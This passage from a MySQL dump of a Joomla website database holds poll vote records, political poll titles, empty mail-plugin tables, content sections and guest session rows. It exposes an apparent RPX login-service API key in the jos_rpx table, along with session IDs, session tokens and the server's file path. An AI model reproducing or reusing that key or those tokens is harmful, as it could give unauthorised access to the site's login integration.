17:47:03',15,15),(616,'2009-10-27 12:23:47',15,15),(617,'2009-10-28 08:01:31',16,15),(618,'2009-10-29 18:46:26',14,15),(619,'2009-10-30 18:42:45',13,15),(620,'2009-10-31 02:08:51',17,15),(621,'2009-11-01 19:15:41',14,15),(622,'2009-11-02 14:43:22',14,15),(623,'2009-11-02 20:01:28',14,15),(624,'2009-11-03 00:57:32',15,15),(625,'2009-11-03 18:24:56',16,15),(626,'2009-11-03 20:28:31',15,15),(627,'2009-11-04 12:03:39',14,15),(628,'2009-11-05 23:23:46',13,15),(629,'2009-11-06 11:13:42',16,15),(630,'2009-11-07 21:40:32',14,15),(631,'2009-11-08 03:18:42',16,15),(632,'2009-11-08 18:07:28',13,15),(633,'2009-11-09 08:41:14',13,15),(634,'2009-11-14 22:22:17',17,15),(635,'2009-11-16 20:26:15',14,15),(636,'2009-11-17 14:38:31',17,15),(637,'2009-11-17 16:17:38',13,15),(638,'2009-11-18 08:03:34',18,15),(639,'2009-11-18 16:03:24',13,15),(640,'2009-11-19 13:50:40',17,15),(641,'2009-11-19 20:39:42',14,15),(642,'2009-11-19 22:27:38',13,15),(643,'2009-11-20 09:25:12',14,15),(644,'2009-11-20 16:21:49',16,15),(645,'2009-11-22 10:28:48',13,15),(646,'2009-11-23 00:00:06',13,15),(647,'2009-11-24 09:31:01',14,15),(648,'2009-11-24 17:28:47',15,15),(649,'2009-11-25 03:25:06',15,15),(650,'2009-11-25 16:43:32',15,15),(651,'2009-11-26 10:00:07',15,15),(652,'2009-11-27 12:24:52',14,15),(653,'2009-11-27 13:21:01',14,15),(654,'2009-11-27 16:03:12',17,15),(655,'2009-11-28 23:33:25',16,15),(656,'2009-11-29 12:34:08',15,15),(657,'2009-12-02 11:35:58',15,15),(658,'2009-12-02 17:44:35',13,15),(659,'2009-12-02 21:26:34',13,15),(660,'2009-12-03 08:07:32',16,15),(661,'2009-12-03 11:09:15',15,15),(662,'2009-12-06 11:39:03',14,15),(663,'2009-12-07 08:44:59',13,15),(664,'2009-12-07 20:58:06',14,15),(665,'2009-12-08 09:54:54',16,15),(666,'2009-12-08 11:55:27',16,15),(667,'2009-12-10 16:21:41',16,15),(668,'2009-12-11 14:09:08',17,15),(669,'2009-12-11 14:42:05',13,15),(670,'2009-12-11 20:00:26',14,15),(671,'2009-12-11 21:56:19',13,15),(672,'2009-12-14 11:30:54',18,15),(673,'2009-12-15 11:16:52',13,15),(674,'2009-12-16 03:56:30',14,15),(675,'2009-12-16 18:57:40',14,15),(676,'2009-12-17 08:04:16',13,15),(677,'2009-12-17 13:35:21',13,15),(678,'2009-12-17 16:44:39',16,15),(679,'2009-12-18 15:08:41',14,15),(680,'2009-12-19 22:55:21',15,15),(681,'2009-12-20 13:48:15',13,15),(682,'2009-12-21 00:10:01',13,15),(683,'2009-12-22 14:41:37',13,15),(684,'2009-12-22 20:04:22',14,15),(685,'2009-12-22 22:50:25',16,15),(686,'2009-12-23 02:33:53',16,15),(687,'2009-12-23 17:04:49',13,15),(688,'2009-12-23 18:58:37',13,15),(689,'2009-12-24 15:03:52',14,15),(690,'2009-12-24 16:00:32',15,15),(691,'2009-12-25 01:02:45',13,15),(692,'2009-12-25 17:01:03',13,15),(693,'2009-12-25 23:31:04',14,15),(694,'2009-12-26 14:29:47',18,15),(695,'2009-12-26 20:00:25',17,15),(696,'2009-12-26 20:06:55',13,15),(697,'2009-12-28 14:15:05',17,15),(698,'2009-12-28 18:38:19',17,15),(699,'2009-12-28 20:09:48',17,15),(700,'2009-12-30 07:46:08',13,15),(701,'2009-12-30 09:17:26',14,15),(702,'2009-12-30 14:20:26',13,15),(703,'2009-12-30 17:28:51',17,15),(704,'2009-12-31 11:42:17',13,15),(705,'2009-12-31 14:17:50',14,15),(706,'2010-01-02 10:41:36',15,15),(707,'2010-01-02 13:19:08',15,15),(708,'2010-01-02 17:41:20',13,15),(709,'2010-01-03 01:34:03',13,15),(710,'2010-01-03 05:13:57',13,15),(711,'2010-01-03 06:15:23',13,15),(712,'2010-01-03 11:27:18',13,15),(713,'2010-01-03 23:35:22',14,15),(714,'2010-01-04 12:02:18',17,15),(715,'2010-01-05 00:17:00',14,15),(716,'2010-01-05 14:11:58',18,15),(717,'2010-01-06 13:48:34',13,15),(718,'2010-01-06 14:53:57',15,15),(719,'2010-01-06 18:16:59',15,15),(720,'2010-01-07 02:42:12',13,15),(721,'2010-01-07 11:40:40',14,15),(722,'2010-01-07 12:11:29',15,15),(723,'2010-01-07 12:24:05',16,15),(724,'2010-01-07 16:55:28',14,15),(725,'2010-01-08 10:12:16',13,15),(726,'2010-01-08 17:14:29',14,15),(727,'2010-01-08 22:30:51',14,15),(728,'2010-01-09 22:43:16',13,15),(729,'2010-01-10 22:16:14',17,15),(730,'2010-01-11 02:32:21',15,15),(731,'2010-01-11 13:28:33',13,15),(732,'2010-01-11 21:52:51',17,15),(733,'2010-01-12 11:51:58',15,15),(734,'2010-01-12 16:13:47',16,15),(735,'2010-01-12 16:18:31',14,15),(736,'2010-01-12 19:43:39',17,15),(737,'2010-01-12 19:53:44',13,15),(738,'2010-01-13 11:18:42',13,15),(739,'2010-01-13 14:58:53',13,15),(740,'2010-01-13 15:33:45',13,15),(741,'2010-01-13 18:25:06',13,15),(742,'2010-01-13 21:11:40',14,15),(743,'2010-01-13 21:33:05',15,15),(744,'2010-01-14 12:33:52',13,15),(745,'2010-01-15 03:45:25',16,15),(746,'2010-01-16 06:37:35',14,15),(747,'2010-01-16 13:06:37',16,15),(748,'2010-01-16 14:44:30',13,15),(749,'2010-01-17 07:34:09',15,15),(750,'2010-01-17 10:31:08',18,15),(751,'2010-01-17 11:01:22',13,15),(752,'2010-01-18 07:00:57',15,15),(753,'2010-01-18 14:23:47',15,15),(754,'2010-01-19 15:11:02',13,15),(755,'2010-01-19 22:34:38',13,15),(756,'2010-01-19 23:47:37',13,15),(757,'2010-01-20 00:19:23',13,15),(758,'2010-01-20 02:07:18',16,15),(759,'2010-01-20 20:19:37',15,15),(760,'2010-01-21 06:00:47',13,15),(761,'2010-01-22 12:09:13',15,15),(762,'2010-01-22 16:30:45',13,15),(763,'2010-01-23 02:32:24',13,15),(764,'2010-01-23 11:16:18',18,15),(765,'2010-01-23 19:08:30',13,15),(766,'2010-01-24 01:24:25',13,15),(767,'2010-01-25 04:08:16',14,15),(768,'2010-01-26 09:51:16',16,15),(769,'2010-01-26 11:37:59',14,15),(770,'2010-01-26 15:09:38',15,15),(771,'2010-01-26 16:20:21',13,15),(772,'2010-01-26 17:46:07',13,15),(773,'2010-01-26 19:50:14',15,15),(774,'2010-01-26 20:29:50',14,15),(775,'2010-01-27 04:19:11',13,15),(776,'2010-01-27 23:35:39',14,15),(777,'2010-01-28 12:56:48',13,15),(778,'2010-01-28 15:05:45',13,15),(779,'2010-01-28 18:38:42',16,15),(780,'2010-01-29 17:35:40',18,15),(781,'2010-01-29 18:21:05',13,15),(782,'2010-01-31 08:41:32',13,15),(783,'2010-01-31 14:23:10',16,15),(784,'2010-01-31 14:24:38',13,15),(785,'2010-02-01 14:42:21',14,15),(786,'2010-02-01 18:07:04',13,15),(787,'2010-02-02 09:46:09',13,15),(788,'2010-02-02 20:30:45',14,15),(789,'2010-02-03 13:52:45',16,15),(790,'2010-02-03 17:21:29',13,15),(791,'2010-02-03 17:52:49',14,15),(792,'2010-02-04 05:14:50',13,15),(793,'2010-02-05 01:48:18',16,15),(794,'2010-02-06 06:04:40',15,15),(795,'2010-02-06 17:35:16',17,15),(796,'2010-02-06 18:15:06',16,15),(797,'2010-02-06 21:00:53',13,15),(798,'2010-02-07 00:03:21',16,15),(799,'2010-02-08 06:52:41',13,15),(800,'2010-02-08 14:04:07',15,15),(801,'2010-02-08 15:10:59',13,15),(802,'2010-02-08 20:41:27',14,15),(803,'2010-02-09 16:08:16',13,15),(804,'2010-02-09 23:21:11',13,15),(805,'2010-02-10 23:14:43',13,15),(806,'2010-02-11 11:31:57',18,15),(807,'2010-02-11 12:37:40',13,15),(808,'2010-02-11 15:59:31',13,15),(809,'2010-02-11 19:30:41',13,15),(810,'2010-02-11 20:30:35',17,15),(811,'2010-02-12 10:09:48',14,15),(812,'2010-02-12 13:22:47',17,15),(813,'2010-02-12 16:02:40',14,15),(814,'2010-02-12 16:09:36',13,15),(815,'2010-02-12 17:21:36',13,15),(816,'2010-02-12 19:19:18',14,15),(817,'2010-02-13 17:46:51',13,15),(818,'2010-02-13 20:02:17',13,15),(819,'2010-02-14 00:10:37',15,15),(820,'2010-02-14 15:03:20',18,15),(821,'2010-02-14 19:23:53',18,15),(822,'2010-02-15 09:46:51',13,15),(823,'2010-02-15 15:26:58',13,15),(824,'2010-02-15 17:12:59',13,15),(825,'2010-02-16 08:45:04',17,15),(826,'2010-02-16 09:25:54',16,15),(827,'2010-02-16 17:18:34',14,15),(828,'2010-02-17 13:09:06',13,15),(829,'2010-02-17 13:46:24',13,15),(830,'2010-02-17 14:53:55',13,15),(831,'2010-02-17 18:30:00',13,15),(832,'2010-02-17 21:10:39',14,15),(833,'2010-02-17 22:10:24',13,15),(834,'2010-02-18 11:06:43',13,15),(835,'2010-02-18 19:04:51',15,15),(836,'2010-02-18 23:24:09',16,15),(837,'2010-02-19 11:10:13',15,15),(838,'2010-02-19 11:42:14',13,15),(839,'2010-02-19 14:07:44',16,15),(840,'2010-02-19 16:43:01',13,15),(841,'2010-02-19 18:13:28',17,15),(842,'2010-02-19 19:46:04',15,15),(843,'2010-02-19 21:04:19',13,15),(844,'2010-02-19 22:35:07',13,15),(845,'2010-02-20 13:22:10',14,15),(846,'2010-02-21 19:32:52',13,15),(847,'2010-02-21 23:09:23',13,15),(848,'2010-02-22 09:24:51',14,15),(849,'2010-02-22 15:26:23',14,15),(850,'2010-02-23 15:20:55',16,15),(851,'2010-02-23 17:54:53',17,15),(852,'2010-02-23 18:45:55',13,15),(853,'2010-02-24 12:00:41',14,15),(854,'2010-02-25 08:06:54',18,15),(855,'2010-02-25 13:08:38',13,15),(856,'2010-02-25 13:15:12',14,15),(857,'2010-02-25 17:37:07',13,15),(858,'2010-02-25 18:58:55',14,15),(859,'2010-02-26 11:41:50',14,15),(860,'2010-02-26 11:46:02',13,15),(861,'2010-02-26 15:56:51',13,15),(862,'2010-02-27 21:00:59',13,15),(863,'2010-02-27 21:23:13',13,15),(864,'2010-02-27 22:34:43',13,15),(865,'2010-02-28 15:27:04',14,15),(866,'2010-02-28 20:58:17',13,15),(867,'2010-02-28 23:41:16',17,15),(868,'2010-06-09 23:10:01',28,16),(869,'2010-06-11 21:28:20',29,16),(870,'2010-06-14 00:57:05',37,17);
/*!40000 ALTER TABLE `jos_poll_date` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_poll_menu`
--

DROP TABLE IF EXISTS `jos_poll_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_poll_menu` (
  `pollid` int(11) NOT NULL DEFAULT '0',
  `menuid` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`pollid`,`menuid`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_poll_menu`
--

LOCK TABLES `jos_poll_menu` WRITE;
/*!40000 ALTER TABLE `jos_poll_menu` DISABLE KEYS */;
INSERT INTO `jos_poll_menu` VALUES (14,1);
/*!40000 ALTER TABLE `jos_poll_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_polls`
--

DROP TABLE IF EXISTS `jos_polls`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_polls` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `voters` int(9) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `access` int(11) NOT NULL DEFAULT '0',
  `lag` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=18 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_polls`
--

LOCK TABLES `jos_polls` WRITE;
/*!40000 ALTER TABLE `jos_polls` DISABLE KEYS */;
INSERT INTO `jos_polls` VALUES (14,'Joomla! is used for?','joomla-is-used-for',11,62,'2010-06-13 15:40:11',1,0,86400),(15,'Which color theme of JSN Epic do you use?','which-color-theme-of-jsn-epic-do-you-use',304,0,'0000-00-00 00:00:00',1,0,86400),(16,'If the 2012 Presidential Elections were held today, which political party would you be most likely to support?','if-the-presidential-elections-were-held-today-which-political-party-would-you-be-most-likely-to-support',2,62,'2010-06-13 15:41:40',1,0,86400),(17,'Are you in favor of term limits for Congressmen and Senators?','are-you-in-favor-of-term-limits-for-congressmen-and-senators',1,62,'2010-06-13 15:41:10',1,0,86400);
/*!40000 ALTER TABLE `jos_polls` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_powermail_account`
--

DROP TABLE IF EXISTS `jos_powermail_account`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_powermail_account` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(45) NOT NULL DEFAULT '',
  `published` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `updated` int(10) unsigned NOT NULL DEFAULT '0',
  `session_id` varchar(85) NOT NULL,
  `interval` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `category` int(10) unsigned NOT NULL DEFAULT '0',
  `lastchecked` int(10) unsigned NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  `active` tinyint(1) unsigned NOT NULL,
  `section` int(11) NOT NULL,
  `whitelist` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_name` (`name`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_powermail_account`
--

LOCK TABLES `jos_powermail_account` WRITE;
/*!40000 ALTER TABLE `jos_powermail_account` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_powermail_account` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_powermail_item`
--

DROP TABLE IF EXISTS `jos_powermail_item`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_powermail_item` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `hash` varchar(32) NOT NULL,
  `uid` int(10) unsigned NOT NULL DEFAULT '0',
  `address` varchar(85) NOT NULL,
  `account` int(10) unsigned NOT NULL DEFAULT '0',
  `contentid` int(10) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_powermail_item`
--

LOCK TABLES `jos_powermail_item` WRITE;
/*!40000 ALTER TABLE `jos_powermail_item` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_powermail_item` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_powermail_media`
--

DROP TABLE IF EXISTS `jos_powermail_media`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_powermail_media` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `msgid` int(10) unsigned NOT NULL,
  `filename` varchar(255) NOT NULL,
  `type` varchar(10) NOT NULL,
  `subtype` varchar(10) NOT NULL,
  `ordering` int(10) unsigned NOT NULL,
  `published` tinyint(1) unsigned NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_published` (`published`),
  KEY `idx_ordering` (`ordering`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_powermail_media`
--

LOCK TABLES `jos_powermail_media` WRITE;
/*!40000 ALTER TABLE `jos_powermail_media` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_powermail_media` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_powermail_user`
--

DROP TABLE IF EXISTS `jos_powermail_user`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_powermail_user` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(85) NOT NULL,
  `addresses` text NOT NULL,
  `published` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `auto_publish` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `category` int(10) unsigned NOT NULL DEFAULT '0',
  `juid` int(10) unsigned NOT NULL DEFAULT '0',
  `section` int(10) NOT NULL,
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_published` (`published`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_powermail_user`
--

LOCK TABLES `jos_powermail_user` WRITE;
/*!40000 ALTER TABLE `jos_powermail_user` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_powermail_user` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_rpx`
--

DROP TABLE IF EXISTS `jos_rpx`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_rpx` (
  `propname` varchar(32) NOT NULL,
  `propvalue` varchar(255) NOT NULL,
  PRIMARY KEY (`propname`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_rpx`
--

LOCK TABLES `jos_rpx` WRITE;
/*!40000 ALTER TABLE `jos_rpx` DISABLE KEYS */;
INSERT INTO `jos_rpx` VALUES ('key','6b86ca46484dc3785d182872a373821adc73d43c');
/*!40000 ALTER TABLE `jos_rpx` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_rpx_mapping`
--

DROP TABLE IF EXISTS `jos_rpx_mapping`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_rpx_mapping` (
  `userid` int(11) NOT NULL,
  `rpxid` varchar(255) NOT NULL,
  PRIMARY KEY (`userid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_rpx_mapping`
--

LOCK TABLES `jos_rpx_mapping` WRITE;
/*!40000 ALTER TABLE `jos_rpx_mapping` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_rpx_mapping` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_sections`
--

DROP TABLE IF EXISTS `jos_sections`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_sections` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL DEFAULT '',
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `image` text NOT NULL,
  `scope` varchar(50) NOT NULL DEFAULT '',
  `image_position` varchar(30) NOT NULL DEFAULT '',
  `description` text NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `count` int(11) NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_scope` (`scope`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_sections`
--

LOCK TABLES `jos_sections` WRITE;
/*!40000 ALTER TABLE `jos_sections` DISABLE KEYS */;
INSERT INTO `jos_sections` VALUES (1,'News','The News','news','articles.jpg','content','right','Select a news topic from the list below, then select a news article to read.',1,0,'0000-00-00 00:00:00',2,0,1,''),(2,'Newsflashes','Newsflashes','newsflashes','','content','left','',1,0,'0000-00-00 00:00:00',3,0,1,''),(3,'FAQs','Frequently Asked Questions','faqs','pastarchives.jpg','content','left','From the list below choose one of our FAQs topics, then select an FAQ to read. If you have a question which is not in this section, please contact us.',1,0,'0000-00-00 00:00:00',4,0,1,''),(4,'JSN Epic','JSN Epic','jsn-epic','','content','left','',1,0,'0000-00-00 00:00:00',1,0,9,'imagefolders=*1*');
/*!40000 ALTER TABLE `jos_sections` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_session`
--

DROP TABLE IF EXISTS `jos_session`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_session` (
  `username` varchar(150) DEFAULT '',
  `time` varchar(14) DEFAULT '',
  `session_id` varchar(200) NOT NULL DEFAULT '0',
  `guest` tinyint(4) DEFAULT '1',
  `userid` int(11) DEFAULT '0',
  `usertype` varchar(50) DEFAULT '',
  `gid` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `client_id` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `data` longtext,
  PRIMARY KEY (`session_id`(64)),
  KEY `whosonline` (`guest`,`usertype`),
  KEY `userid` (`userid`),
  KEY `time` (`time`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_session`
--

LOCK TABLES `jos_session` WRITE;
/*!40000 ALTER TABLE `jos_session` DISABLE KEYS */;
INSERT INTO `jos_session` VALUES ('','1277304251','bf96f85c8c76d7fedc4e0a94f32162fc',1,0,'',0,0,'__default|a:8:{s:15:\"session.counter\";i:1;s:19:\"session.timer.start\";i:1277304251;s:18:\"session.timer.last\";i:1277304251;s:17:\"session.timer.now\";i:1277304251;s:22:\"session.client.browser\";s:11:\"Mozilla/4.0\";s:8:\"registry\";O:9:\"JRegistry\":3:{s:17:\"_defaultNameSpace\";s:7:\"session\";s:9:\"_registry\";a:1:{s:7:\"session\";a:1:{s:4:\"data\";O:8:\"stdClass\":0:{}}}s:7:\"_errors\";a:0:{}}s:4:\"user\";O:5:\"JUser\":19:{s:2:\"id\";i:0;s:4:\"name\";N;s:8:\"username\";N;s:5:\"email\";N;s:8:\"password\";N;s:14:\"password_clear\";s:0:\"\";s:8:\"usertype\";N;s:5:\"block\";N;s:9:\"sendEmail\";i:0;s:3:\"gid\";i:0;s:12:\"registerDate\";N;s:13:\"lastvisitDate\";N;s:10:\"activation\";N;s:6:\"params\";N;s:3:\"aid\";i:0;s:5:\"guest\";i:1;s:7:\"_params\";O:10:\"JParameter\":7:{s:4:\"_raw\";s:0:\"\";s:4:\"_xml\";N;s:9:\"_elements\";a:0:{}s:12:\"_elementPath\";a:1:{i:0;s:78:\"/home/nsadmin/public_html/retakeourgov/libraries/joomla/html/parameter/element\";}s:17:\"_defaultNameSpace\";s:8:\"_default\";s:9:\"_registry\";a:1:{s:8:\"_default\";a:1:{s:4:\"data\";O:8:\"stdClass\":0:{}}}s:7:\"_errors\";a:0:{}}s:9:\"_errorMsg\";N;s:7:\"_errors\";a:0:{}}s:13:\"session.token\";s:32:\"3e3614a9f352cde6b725c3d319cebb9d\";}'),('','1277304289','d589d3357a25af857e87e0bfbdd66e4d',1,0,'',0,0,'__default|a:8:{s:15:\"session.counter\";i:2;s:19:\"session.timer.start\";i:1277304254;s:18:\"session.timer.last\";i:1277304254;s:17:\"session.timer.now\";i:1277304289;s:22:\"session.client.browser\";s:174:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MS-RTC LM 8)\";s:8:\"registry\";O:9:\"JRegistry\":3:{s:17:\"_defaultNameSpace\";s:7:\"session\";s:9:\"_registry\";a:1:{s:7:\"session\";a:1:{s:4:\"data\";O:8:\"stdClass\":0:{}}}s:7:\"_errors\";a:0:{}}s:4:\"user\";O:5:\"JUser\":19:{s:2:\"id\";i:0;s:4:\"name\";N;s:8:\"username\";N;s:5:\"email\";N;s:8:\"password\";N;s:14:\"password_clear\";s:0:\"\";s:8:\"usertype\";N;s:5:\"block\";N;s:9:\"sendEmail\";i:0;s:3:\"gid\";i:0;s:12:\"registerDate\";N;s:13:\"lastvisitDate\";N;s:10:\"activation\";N;s:6:\"params\";N;s:3:\"aid\";i:0;s:5:\"guest\";i:1;s:7:\"_params\";O:10:\"JParameter\":7:{s:4:\"_raw\";s:0:\"\";s:4:\"_xml\";N;s:9:\"_elements\";a:0:{}s:12:\"_elementPath\";a:1:{i:0;s:78:\"/home/nsadmin/public_html/retakeourgov/libraries/joomla/html/parameter/element\";}s:17:\"_defaultNameSpace\";s:8:\"_default\";s:9:\"_registry\";a:1:{s:8:\"_default\";a:1:{s:4:\"data\";O:8:\"stdClass\":0:{}}}s:7:\"_errors\";a:0:{}}s:9:\"_errorMsg\";N;s:7:\"_errors\";a:0:{}}s:13:\"session.token\";s:32:\"0de77d5780da4de851d9a0492ef3843a\";}'),('','1277304255','d1b330500f2f0f286ad3a2db27d07203',1,0,'',0,0,'__default|a:7:{s:15:\"session.counter\";i:1;s:19:\"session.timer.start\";i:1277304255;s:18:\"session.timer.last\";i:1277304255;s:17:\"session.timer.now\";i:1277304255;s:22:\"session.client.browser\";s:11:\"Mozilla/4.0\";s:8:\"registry\";O:9:\"JRegistry\":3:{s:17:\"_defaultNameSpace\";s:7:\"session\";s:9:\"_registry\";a:1:{s:7:\"session\";a:1:{s:4:\"data\";O:8:\"stdClass\":0:{}}}s:7:\"_errors\";a:0:{}}s:4:\"user\";O:5:\"JUser\":19:{s:2:\"id\";i:0;s:4:\"name\";N;s:8:\"username\";N;s:5:\"email\";N;s:8:\"password\";N;s:14:\"password_clear\";s:0:\"\";s:8:\"usertype\";N;s:5:\"block\";N;s:9:\"sendEmail\";i:0;s:3:\"gid\";i:0;s:12:\"registerDate\";N;s:13:\"lastvisitDate\";N;s:10:\"activation\";N;s:6:\"params\";N;s:3:\"aid\";i:0;s:5:\"guest\";i:1;s:7:\"_params\";O:10:\"JParameter\":7:{s:4:\"_raw\";s:0:\"\";s:4:\"_xml\";N;s:9:\"_elements\";a:0:{}s:12:\"_elementPath\";a:1:{i:0;s:78:\"/home/nsadmin/public_html/retakeourgov/libraries/joomla/html/parameter/element\";}s:17:\"_defaultNameSpace\";s:8:\"_default\";s:9:\"_registry\";a:1:{s:8:\"_default\";a:1:{s:4:\"data\";O:8:\"stdClass\":0:{}}}s:7:\"_errors\";a:0:{}}s:9:\"_errorMsg\";N;s:7:\"_errors\";a:0:{}}}'),('','1277304255','ae36c0b903f8f79e18636ae90ea511d2',1,0,'',0,0,'__default|a:7:{s:15:\"session.counter\";i:1;s:19:\"session.timer.start\";i:1277304255;s:18:\"session.timer.last\";i:1277304255;s:17:\"session.timer.now\";i:1277304255;s:22:\"session.client.browser\";s:11:\"Mozilla/4.0\";s:8:\"registry\";O:9:\"JRegistry\":3:{s:17:\"_defaultNameSpace\";s:7:\"session\";s:9:\"_registry\";a:1:{s:7:\"session\";a:1:{s:4:\"data\";O:8:\"stdClass\":0:{}}}s:7:\"_errors\";a:0:{}}s:4:\"user\";O:5:\"JUser\":19:{s:2:\"id\";i:0;s:4:\"name\";N;s:8:\"username\";N;s:5:\"email\";N;s:8:\"password\";N;s:14:\"password_clear\";s:0:\"\";s:8:\"usertype\";N;s:5:\"block\";N;s:9:\"sendEmail\";i:0;s:3:\"gid\";i:0;s:12:\"registerDate\";N;s:13:\"lastvisitDate\";N;s:10:\"activation\";N;s:6:\"params\";N;s:3:\"aid\";i:0;s:5:\"guest\";i:1;s:7:\"_params\";O:10:\"JParameter\":7:{s:4:\"_raw\";s:0:\"\";s:4:\"_xml\";N;s:9:\"_elements\";a:0:{}s:12:\"_elementPath\";a:1:{i:0;s:78:\"/home/nsadmin/public_html/retakeourgov/libraries/joomla/html/parameter/element\";}s:17:\"_defaultNameSpace\";s:8:\"_default\";s:9:\"_registry\";a:1:{s:8:\"_default\";a:1:{s:4:\"data\";O:8:\"stdClass\":0:{}}}s:7:\"_errors\";a:0:{}}s:9:\"_errorMsg\";N;s:7:\"_errors\";a:0:{}}}');
/*!40000 ALTER TABLE `jos_session` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_stats_agents`
--

DROP TABLE IF EXISTS `jos_stats_agents`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_stats_agents` (
  `agent` varchar(255) NOT NULL DEFAULT '',
  `type` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `hits` int(11) unsigned NOT NULL DEFAULT '1'
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_stats_agents`
--

LOCK TABLES `jos_stats_agents` WRITE;
/*!40000 ALTER TABLE `jos_stats_agents` DISABLE KEYS */;
